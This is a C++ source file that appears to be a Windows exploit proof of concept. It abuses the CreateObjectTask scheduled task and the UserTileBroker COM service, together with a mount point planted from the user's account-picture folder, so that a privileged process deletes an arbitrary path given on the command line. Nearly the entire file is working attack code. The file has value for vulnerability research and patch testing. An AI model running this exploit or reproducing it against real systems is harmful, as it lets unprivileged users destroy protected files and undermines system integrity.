// CreateObjectTaskCPP.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Propsys.h>
#include <comdef.h>
#include <vector>
#include <FileSymlink.h>
#include <FileOpLock.h>
#include <strsafe.h>
#include <Shlwapi.h>
#include <ShellScalingAPI.h>
#include <ShlObj.h>
#include <sddl.h>
#include "ReparsePoint.h"
#include "ScopedHandle.h"
#include "typed_buffer.h"

#pragma comment(lib, "rpcrt4.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "Shcore.lib")

extern "C" STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv);

class __declspec(uuid("d6d737ff-9e13-4a65-be89-a1e013cc6b76")) IUserTileBroker : public IUnknown
{
public:
	virtual HRESULT __stdcall SetUserTile(IStream* a, IStream*b, IStream* c, int type) = 0;
	virtual HRESULT __stdcall ResetUserTile() = 0;
};

class CoInitializer
{
public:

	CoInitializer(DWORD dwCoInit)
	{
		HRESULT hr = CoInitializeEx(NULL, dwCoInit);
		if (FAILED(hr))
		{
			throw _com_error(hr);
		}
	}

	~CoInitializer()
	{
		CoUninitialize();
	}
};

GUID CLSID_ShellCreateObject = { 0x135FD325, 0x45B7, 0x4C30, { 0x89, 0xF8, 0x43, 0x86, 0x96, 0x16, 0x69, 0xF0, } };
GUID CLSID_UserTileBroker = { 0x032C35F6, 0x11E2, 0x497B, { 0x9D, 0x78, 0x6A, 0xD0, 0x28, 0x8F, 0xBD, 0x48, } };

#define REGINT(x) _COM_SMARTPTR_TYPEDEF(x, __uuidof(x))

REGINT(ITaskFolder);
REGINT(ITaskDefinition);
REGINT(IRegistrationInfo);
REGINT(IPrincipal);
REGINT(ITaskSettings);
REGINT(ITriggerCollection);
REGINT(ITrigger);
REGINT(IActionCollection);
REGINT(IRegistrationTrigger);
REGINT(ITaskService);
REGINT(IAction);
REGINT(IExecAction);
REGINT(IRegisteredTask);
REGINT(ICreateObject);
REGINT(IRunningTask);
REGINT(IUserTileBroker);

void CheckHr(HRESULT hr)
{
	if (FAILED(hr))
	{
		throw _com_error(hr);
	}
}

IRegisteredTaskPtr GetRegisteredTask(bstr_t folder, bstr_t task)
{	
	ITaskServicePtr pService;
	HRESULT hr = CoCreateInstance(CLSID_TaskScheduler,
		NULL,
		CLSCTX_INPROC_SERVER,
		IID_PPV_ARGS(&pService));

	if (FAILED(hr))
	{
		printf("Failed to create an instance of ITaskService\n");
		throw _com_error(hr);
	}

	hr = pService->Connect(_variant_t(), _variant_t(),
		_variant_t(), _variant_t());
	if (FAILED(hr))
	{
		printf("ITaskService::Connect failed\n");
		throw _com_error(hr);
	}

	ITaskFolderPtr pRootFolder;
	hr = pService->GetFolder(folder, &pRootFolder);
	if (FAILED(hr))
	{
		printf("Cannot get Root Folder pointer\n");
		throw _com_error(hr);
	}

	IRegisteredTaskPtr pRegTask;

	hr = pRootFolder->GetTask(task, &pRegTask);
	if (FAILED(hr))
	{
		printf("Failed to get task\n");
		throw _com_error(hr);
	}

	return pRegTask;
}

void StartSystemTask()
{
	IRegisteredTaskPtr pRegTask = GetRegisteredTask(L"\\Microsoft\\Windows\\Shell", L"CreateObjectTask");
	
	IRunningTaskPtr pRunningTask;	

	HRESULT hr = pRegTask->Run(variant_t(), &pRunningTask);
	if (FAILED(hr))
	{
		printf("Failed to run task\n");
		throw _com_error(hr);
	}	
}

void StopSystemTask()
{
	IRegisteredTaskPtr pRegTask = GetRegisteredTask(L"\\Microsoft\\Windows\\Shell", L"CreateObjectTask");

	IRunningTaskPtr pRunningTask;

	pRegTask->Stop(0);
}

ICreateObjectPtr GetCreateObject()
{
	ICreateObjectPtr co;

	if (FAILED(CoCreateInstance(CLSID_ShellCreateObject, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&co))))
	{
		ScopedHandle hEvent(CreateEvent(nullptr, FALSE, FALSE, L"Global\\ShellCreateObjectTaskReadyEvent"), false);
		if (hEvent.IsValid())
		{
			// Start Task
			StartSystemTask();

			if (WaitForSingleObject(hEvent, 10000) == WAIT_OBJECT_0)			
			{
				CheckHr(CoCreateInstance(CLSID_ShellCreateObject, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&co)));
			}			
		}
		else
		{
			throw _com_error(E_FAIL);
		}
	}

	return co;
}

void ThrowLastError(DWORD dwLastError)
{
	throw _com_error(0x80070000 | dwLastError);
}

void CheckLastError(BOOL b)
{
	if (!b)
	{
		ThrowLastError(GetLastError());
	}
}

bstr_t GetUserSid()
{
	ScopedHandle hToken;

	CheckLastError(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, hToken.GetBuffer()));

	typed_buffer_ptr<TOKEN_USER> token_user;
	DWORD dwLength;

	GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwLength);

	token_user.resize(dwLength);

	CheckLastError(GetTokenInformation(hToken, TokenUser, token_user, token_user.size(), &dwLength));

	LPWSTR lpSid;

	CheckLastError(ConvertSidToStringSidW(token_user->User.Sid, &lpSid));
	
	bstr_t ret = lpSid;
	LocalFree(lpSid);

	return ret;
}

bstr_t GetPictureFolder()
{
	PWSTR path;
	CheckHr(SHGetKnownFolderPath(FOLDERID_PublicUserTiles, KF_FLAG_CREATE | KF_FLAG_NO_ALIAS, nullptr, &path));
	bstr_t ret = path;
	CoTaskMemFree(path);

	return ret + L"\\" + GetUserSid();
}

unsigned char jpeg_data[667] = {
	0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01,
	0x01, 0x01, 0x00, 0x60, 0x00, 0x60, 0x00, 0x00, 0xFF, 0xE1, 0x00, 0x22,
	0x45, 0x78, 0x69, 0x66, 0x00, 0x00, 0x4D, 0x4D, 0x00, 0x2A, 0x00, 0x00,
	0x00, 0x08, 0x00, 0x01, 0x01, 0x12, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01,
	0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xDB, 0x00, 0x43,
	0x00, 0x02, 0x01, 0x01, 0x02, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02,
	0x02, 0x02, 0x02, 0x03, 0x05, 0x03, 0x03, 0x03, 0x03, 0x03, 0x06, 0x04,
	0x04, 0x03, 0x05, 0x07, 0x06, 0x07, 0x07, 0x07, 0x06, 0x07, 0x07, 0x08,
	0x09, 0x0B, 0x09, 0x08, 0x08, 0x0A, 0x08, 0x07, 0x07, 0x0A, 0x0D, 0x0A,
	0x0A, 0x0B, 0x0C, 0x0C, 0x0C, 0x0C, 0x07, 0x09, 0x0E, 0x0F, 0x0D, 0x0C,
	0x0E, 0x0B, 0x0C, 0x0C, 0x0C, 0xFF, 0xDB, 0x00, 0x43, 0x01, 0x02, 0x02,
	0x02, 0x03, 0x03, 0x03, 0x06, 0x03, 0x03, 0x06, 0x0C, 0x08, 0x07, 0x08,
	0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C,
	0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C,
	0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C,
	0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C, 0x0C,
	0x0C, 0x0C, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x01, 0x03,
	0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xFF, 0xC4, 0x00,
	0x1F, 0x00, 0x00, 0x01, 0x05, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05,
	0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0xFF, 0xC4, 0x00, 0xB5, 0x10, 0x00,
	0x02, 0x01, 0x03, 0x03, 0x02, 0x04, 0x03, 0x05, 0x05, 0x04, 0x04, 0x00,
	0x00, 0x01, 0x7D, 0x01, 0x02, 0x03, 0x00, 0x04, 0x11, 0x05, 0x12, 0x21,
	0x31, 0x41, 0x06, 0x13, 0x51, 0x61, 0x07, 0x22, 0x71, 0x14, 0x32, 0x81,
	0x91, 0xA1, 0x08, 0x23, 0x42, 0xB1, 0xC1, 0x15, 0x52, 0xD1, 0xF0, 0x24,
	0x33, 0x62, 0x72, 0x82, 0x09, 0x0A, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x25,
	0x26, 0x27, 0x28, 0x29, 0x2A, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A,
	0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x53, 0x54, 0x55, 0x56,
	0x57, 0x58, 0x59, 0x5A, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A,
	0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x83, 0x84, 0x85, 0x86,
	0x87, 0x88, 0x89, 0x8A, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99,
	0x9A, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xB2, 0xB3,
	0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6,
	0xC7, 0xC8, 0xC9, 0xCA, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9,
	0xDA, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xF1,
	0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFF, 0xC4, 0x00,
	0x1F, 0x01, 0x00, 0x03, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05,
	0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0xFF, 0xC4, 0x00, 0xB5, 0x11, 0x00,
	0x02, 0x01, 0x02, 0x04, 0x04, 0x03, 0x04, 0x07, 0x05, 0x04, 0x04, 0x00,
	0x01, 0x02, 0x77, 0x00, 0x01, 0x02, 0x03, 0x11, 0x04, 0x05, 0x21, 0x31,
	0x06, 0x12, 0x41, 0x51, 0x07, 0x61, 0x71, 0x13, 0x22, 0x32, 0x81, 0x08,
	0x14, 0x42, 0x91, 0xA1, 0xB1, 0xC1, 0x09, 0x23, 0x33, 0x52, 0xF0, 0x15,
	0x62, 0x72, 0xD1, 0x0A, 0x16, 0x24, 0x34, 0xE1, 0x25, 0xF1, 0x17, 0x18,
	0x19, 0x1A, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x35, 0x36, 0x37, 0x38, 0x39,
	0x3A, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x53, 0x54, 0x55,
	0x56, 0x57, 0x58, 0x59, 0x5A, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
	0x6A, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x82, 0x83, 0x84,
	0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97,
	0x98, 0x99, 0x9A, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA,
	0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xC2, 0xC3, 0xC4,
	0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7,
	0xD8, 0xD9, 0xDA, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA,
	0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFF, 0xDA, 0x00,
	0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, 0xFD,
	0xD4, 0xA2, 0x8A, 0x28, 0x03, 0xFF, 0xD9
};


IStreamPtr CreateJpegStream()
{
	HGLOBAL hGlobal = GlobalAlloc(GMEM_MOVEABLE, sizeof(jpeg_data));

	LPVOID lpImage = GlobalLock(hGlobal);

	memcpy(lpImage, jpeg_data, sizeof(jpeg_data));

	GlobalUnlock(hGlobal);

	IStreamPtr stm;

	CheckHr(CreateStreamOnHGlobal(hGlobal, TRUE, &stm));

	return stm;
}

void DoWork2(bstr_t path_to_delete)
{	
	try
	{		
		CheckHr(CoInitializeSecurity(
			NULL,
			-1,
			NULL,
			NULL,
			RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
			RPC_C_IMP_LEVEL_IMPERSONATE,
			NULL,
			0,
			NULL));

		ICreateObjectPtr co = GetCreateObject();	
		IUserTileBrokerPtr broker;

		bstr_t picture_folder = GetPictureFolder();

		printf("Picture Folder: %ls\n", picture_folder.GetBSTR());

		if (!CreateDirectory(picture_folder, nullptr))
		{
			DWORD dwError = GetLastError();

			if (dwError != ERROR_ALREADY_EXISTS)
			{
				ThrowLastError(dwError);
			}
		}

		if (!ReparsePoint::CreateMountPoint(picture_folder.GetBSTR(), path_to_delete.GetBSTR(), L""))
		{
			ThrowLastError(ERROR_ACCESS_DENIED);
		}

		CheckHr(co->CreateObject(CLSID_UserTileBroker, nullptr, IID_PPV_ARGS(&broker)));
		//bp Windows_UI_Immersive!CUserTileBroker::SetUserTile
		//getchar();

		CheckHr(broker->SetUserTile(CreateJpegStream(), CreateJpegStream(), nullptr, GetScaleFactorForDevice(DEVICE_IMMERSIVE)));

		printf("Done\n");
	}
	catch (_com_error& e)
	{
		printf("%ls\n", e.ErrorMessage());
	}
}

int _tmain(int argc, _TCHAR* argv[])
{	
	if (argc < 2)
	{
		printf("Usage: %ls path_to_delete\n", argv[0]);
		return 1;
	}

	CoInitializer c(COINIT_MULTITHREADED);

	DoWork2(argv[1]);

	return 0;
}

